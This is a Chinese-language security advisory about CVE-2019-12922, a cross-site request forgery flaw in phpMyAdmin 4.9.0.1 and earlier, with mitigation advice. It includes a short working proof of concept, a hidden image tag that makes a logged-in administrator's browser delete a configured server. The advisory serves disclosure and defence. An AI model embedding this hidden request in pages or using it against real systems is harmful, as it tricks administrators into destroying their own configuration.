首頁 > 安全研究 > 安全通報 > 安全通告

phpMyAdmin跨站請求偽造漏洞安全通告

發布時間 2019-09-23

漏洞編號和級別


CVE編號:CVE-2019-12922,危險級別:中危,CVSS分值:6.5


影響版本


phpMyAdmin<= 4.9.0.1


漏洞概述


phpMyAdmin是一個MySQL和MariaDB數據庫的免費開源管理工具,廣泛用于管理WordPress、Joomla和許多其他內容管理平臺創建的網站的數據庫。


近日,安全研究人員Manuel Garcia Cardenas披露了phpMyAdmin的一個跨站請求偽造(CVE-2019-12922)漏洞。攻擊者可利用該漏洞誘使認證用戶執行惡意操作。當攻擊者將惡意構造的URL發送給目標web管理員時,若該web管理員已使用同一瀏覽器登陸了phpmyAdmin面板,并打開該鏈接,即可執行URL包含的惡意請求刪除目標服務器上phpMyAdmin面板設置頁面中所配置的服務器。


漏洞驗證


POC:利用 CSRF —刪除主服務器。


<p>Deleting Server 1</p>

<img src="

http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1";

style="display:none;" />


修復建議


官方暫未發布針對此漏洞的修復版本。


臨時緩解措施:


用戶可通過在每次調用時使用token變量驗證來對該漏洞進行防護。


在維護人員對該漏洞進行修復前,強烈建議相關的用戶避免點擊任何可疑的鏈接造成風險,請關注官方相關消息,以便及時升級phpMyAdmin至修復版本來防護此漏洞。


參考鏈接


https://thehackernews.com/2019/09/phpmyadmin-csrf-exploit.html

https://seclists.org/fulldisclosure/2019/Sep/23


上一篇 下一篇